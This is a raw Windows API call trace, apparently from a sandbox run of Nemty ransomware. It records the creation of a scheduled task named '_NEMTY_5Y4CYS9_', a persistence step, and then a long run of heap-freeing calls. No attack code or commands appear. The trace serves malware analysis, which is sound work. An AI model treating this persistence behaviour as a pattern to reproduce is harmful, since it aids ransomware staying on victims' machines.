GetProcessHeap () returned 0x480000 [0073.757] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x496aa0) returned 0x30 [0073.757] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x496aa0 | out: hHeap=0x480000) returned 1 [0073.757] GetProcessHeap () returned 0x480000 [0073.757] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x82) returned 0x4a8da8 [0073.757] _vsnwprintf (in: _Buffer=0x13d4bc, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0x13d028 | out: _Buffer="SUCCESS: The scheduled task \"_NEMTY_5Y4CYS9_\" has successfully been created.\n") returned 77 [0073.757] _fileno (_File=0x74eb2920) returned 1 [0073.757] _errno () returned 0x2907d8 [0073.757] _get_osfhandle (_FileHandle=1) returned 0x7 [0073.757] _errno () returned 0x2907d8 [0073.757] GetFileType (hFile=0x7) returned 0x2 [0073.758] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0073.758] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x13cfec | out: lpMode=0x13cfec) returned 1 [0073.758] __iob_func () returned 0x74eb2900 [0073.758] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0073.758] lstrlenW (lpString="SUCCESS: The scheduled task \"_NEMTY_5Y4CYS9_\" has successfully been created.\n") returned 77 [0073.758] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x13d4bc*, nNumberOfCharsToWrite=0x4d, lpNumberOfCharsWritten=0x13d014, lpReserved=0x0 | out: lpBuffer=0x13d4bc*, lpNumberOfCharsWritten=0x13d014*=0x4d) returned 1 [0073.759] IUnknown:Release (This=0x292788) returned 0x0 [0073.759] TaskScheduler:IUnknown:Release (This=0x293ea8) returned 0x0 [0073.759] TaskScheduler:IUnknown:Release (This=0x293e40) returned 0x0 [0073.759] TaskScheduler:IUnknown:Release (This=0x293dd8) returned 0x1 [0073.759] lstrlenW (lpString="") returned 0 [0073.759] GetProcessHeap () returned 0x480000 [0073.759] GetProcessHeap () returned 0x480000 [0073.759] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x496b40) returned 1 [0073.759] GetProcessHeap () returned 0x480000 [0073.759] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x496b40) returned 0x1fc [0073.759] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x496b40 | out: hHeap=0x480000) returned 1 [0073.759] GetProcessHeap () returned 0x480000 [0073.759] GetProcessHeap () returned 0x480000 [0073.759] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495488) returned 1 [0073.759] GetProcessHeap () returned 0x480000 [0073.759] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495488) returned 0x16 [0073.759] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495488 | out: hHeap=0x480000) returned 1 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494c78) returned 1 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494c78) returned 0x10 [0073.760] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494c78 | out: hHeap=0x480000) returned 1 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4954a8) returned 1 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4954a8) returned 0x14 [0073.760] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4954a8 | out: hHeap=0x480000) returned 1 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x496720) returned 1 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x496720) returned 0xa0 [0073.760] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x496720 | out: hHeap=0x480000) returned 1 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494d50) returned 1 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494d50) returned 0x10 [0073.760] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494d50 | out: hHeap=0x480000) returned 1 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495348) returned 1 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495348) returned 0x14 [0073.760] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495348 | out: hHeap=0x480000) returned 1 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x496ad8) returned 1 [0073.760] GetProcessHeap () returned 0x480000 [0073.760] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x496ad8) returned 0x5c [0073.760] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x496ad8 | out: hHeap=0x480000) returned 1 [0073.760] GetProcessHeap () returned 0x480000 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494d98) returned 1 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494d98) returned 0x10 [0073.761] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494d98 | out: hHeap=0x480000) returned 1 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495328) returned 1 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495328) returned 0x14 [0073.761] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495328 | out: hHeap=0x480000) returned 1 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x496a38) returned 1 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x496a38) returned 0x60 [0073.761] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x496a38 | out: hHeap=0x480000) returned 1 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494df8) returned 1 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494df8) returned 0x10 [0073.761] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494df8 | out: hHeap=0x480000) returned 1 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495308) returned 1 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495308) returned 0x14 [0073.761] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495308 | out: hHeap=0x480000) returned 1 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494de0) returned 1 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494de0) returned 0xc [0073.761] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494de0 | out: hHeap=0x480000) returned 1 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] GetProcessHeap () returned 0x480000 [0073.761] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494dc8) returned 1 [0073.761] GetProcessHeap () returned 0x480000 [0073.762] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494dc8) returned 0x10 [0073.762] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494dc8 | out: hHeap=0x480000) returned 1 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4952e8) returned 1 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4952e8) returned 0x14 [0073.762] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4952e8 | out: hHeap=0x480000) returned 1 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495b30) returned 1 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495b30) returned 0x208 [0073.762] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495b30 | out: hHeap=0x480000) returned 1 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494cf0) returned 1 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494cf0) returned 0x10 [0073.762] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494cf0 | out: hHeap=0x480000) returned 1 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4952a8) returned 1 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4952a8) returned 0x14 [0073.762] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4952a8 | out: hHeap=0x480000) returned 1 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4967c8) returned 1 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4967c8) returned 0x200 [0073.762] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4967c8 | out: hHeap=0x480000) returned 1 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494d68) returned 1 [0073.762] GetProcessHeap () returned 0x480000 [0073.762] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494d68) returned 0x10 [0073.763] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494d68 | out: hHeap=0x480000) returned 1 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495248) returned 1 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495248) returned 0x14 [0073.763] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495248 | out: hHeap=0x480000) returned 1 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4953c8) returned 1 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4953c8) returned 0x14 [0073.763] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4953c8 | out: hHeap=0x480000) returned 1 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494db0) returned 1 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494db0) returned 0x10 [0073.763] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494db0 | out: hHeap=0x480000) returned 1 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4951c8) returned 1 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4951c8) returned 0x14 [0073.763] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4951c8 | out: hHeap=0x480000) returned 1 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495408) returned 1 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495408) returned 0x16 [0073.763] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495408 | out: hHeap=0x480000) returned 1 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494d80) returned 1 [0073.763] GetProcessHeap () returned 0x480000 [0073.763] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494d80) returned 0x10 [0073.763] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494d80 | out: hHeap=0x480000) returned 1 [0073.763] GetProcessHeap () returned 0x480000 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495190) returned 1 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495190) returned 0x14 [0073.764] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495190 | out: hHeap=0x480000) returned 1 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495060) returned 1 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495060) returned 0x2 [0073.764] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495060 | out: hHeap=0x480000) returned 1 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495070) returned 1 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495070) returned 0x14 [0073.764] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495070 | out: hHeap=0x480000) returned 1 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495090) returned 1 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495090) returned 0x14 [0073.764] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495090 | out: hHeap=0x480000) returned 1 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4950b0) returned 1 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4950b0) returned 0x14 [0073.764] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4950b0 | out: hHeap=0x480000) returned 1 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4950d0) returned 1 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4950d0) returned 0x14 [0073.764] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4950d0 | out: hHeap=0x480000) returned 1 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] GetProcessHeap () returned 0x480000 [0073.764] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495368) returned 1 [0073.764] GetProcessHeap () returned 0x480000 [0073.765] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495368) returned 0x14 [0073.765] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495368 | out: hHeap=0x480000) returned 1 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495548) returned 1 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495548) returned 0x16 [0073.765] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495548 | out: hHeap=0x480000) returned 1 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495388) returned 1 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495388) returned 0x14 [0073.765] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495388 | out: hHeap=0x480000) returned 1 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4969d0) returned 1 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4969d0) returned 0x30 [0073.765] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4969d0 | out: hHeap=0x480000) returned 1 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4953a8) returned 1 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4953a8) returned 0x14 [0073.765] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4953a8 | out: hHeap=0x480000) returned 1 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4a8da8) returned 1 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4a8da8) returned 0x82 [0073.765] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4a8da8 | out: hHeap=0x480000) returned 1 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495468) returned 1 [0073.765] GetProcessHeap () returned 0x480000 [0073.765] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495468) returned 0x14 [0073.765] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495468 | out: hHeap=0x480000) returned 1 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494e10) returned 1 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494e10) returned 0xe [0073.766] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494e10 | out: hHeap=0x480000) returned 1 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495448) returned 1 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495448) returned 0x14 [0073.766] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495448 | out: hHeap=0x480000) returned 1 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494e28) returned 1 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494e28) returned 0xe [0073.766] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494e28 | out: hHeap=0x480000) returned 1 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495428) returned 1 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495428) returned 0x14 [0073.766] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495428 | out: hHeap=0x480000) returned 1 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494e40) returned 1 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494e40) returned 0xc [0073.766] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494e40 | out: hHeap=0x480000) returned 1 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4953e8) returned 1 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4953e8) returned 0x14 [0073.766] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4953e8 | out: hHeap=0x480000) returned 1 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] GetProcessHeap () returned 0x480000 [0073.766] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494e58) returned 1 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494e58) returned 0xe [0073.767] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494e58 | out: hHeap=0x480000) returned 1 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4954c8) returned 1 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4954c8) returned 0x14 [0073.767] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4954c8 | out: hHeap=0x480000) returned 1 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494e70) returned 1 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494e70) returned 0x10 [0073.767] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494e70 | out: hHeap=0x480000) returned 1 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4954e8) returned 1 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4954e8) returned 0x14 [0073.767] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4954e8 | out: hHeap=0x480000) returned 1 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494e88) returned 1 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494e88) returned 0xe [0073.767] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494e88 | out: hHeap=0x480000) returned 1 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495508) returned 1 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495508) returned 0x14 [0073.767] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495508 | out: hHeap=0x480000) returned 1 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494ea0) returned 1 [0073.767] GetProcessHeap () returned 0x480000 [0073.767] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494ea0) returned 0x10 [0073.768] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494ea0 | out: hHeap=0x480000) returned 1 [0073.768] GetProcessHeap () returned 0x480000 [0073.768] GetProcessHeap () returned 0x480000 [0073.768] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495528) returned 1 [0073.768] GetProcessHeap () returned 0x480000 [0073.768] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495528) returned 0x14 [0073.768] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495528 | out: hHeap=0x480000) returned 1 [0073.768] GetProcessHeap () returned 0x480000 [0073.768] GetProcessHeap () returned 0x480000 [0073.768] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494ca8) returned 1 [0073.768] GetProcessHeap () returned 0x480000 [0073.768] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494ca8) returned 0x10 [0073.768] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x494ca8 | out: hHeap=0x480000) returned 1 [0073.768] GetProcessHeap () returned 0x480000 [0073.768] GetProcessHeap () returned 0x480000 [0073.768] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4950f0) returned 1 [0073.768] GetProcessHeap () returned 0x480000 [0073.768] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4950f0) returned 0x14 [0073.768] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4950f0 | out: hHeap=0x480000) returned 1 [0073.768] GetProcessHeap () returned 0x480000 [0073.768] GetProcessHeap () returned 0x480000 [0073.768] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495110) returned 1 [0073.768] GetProcessHeap () returned 0x480000 [0073.768] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495110) returned 0x14 [0073.768] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495110 | out: hHeap=0x480000) returned 1 [0073.768] GetProcessHeap () returned 0x480000 [0073.768] GetProcessHeap () returned 0x480000 [0073.768] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495130) returned 1 [0073.768] GetProcessHeap () returned 0x480000 [0073.768] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495130) returned 0x14 [0073.768] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495130 | out: hHeap=0x480000) returned 1 [0073.768] GetProcessHeap () returned 0x480000 [0073.768] GetProcessHeap () returned 0x480000 [0073.768] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495150) returned 1 [0073.768] GetProcessHeap () returned 0x480000 [0073.769] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495150) returned 0x14 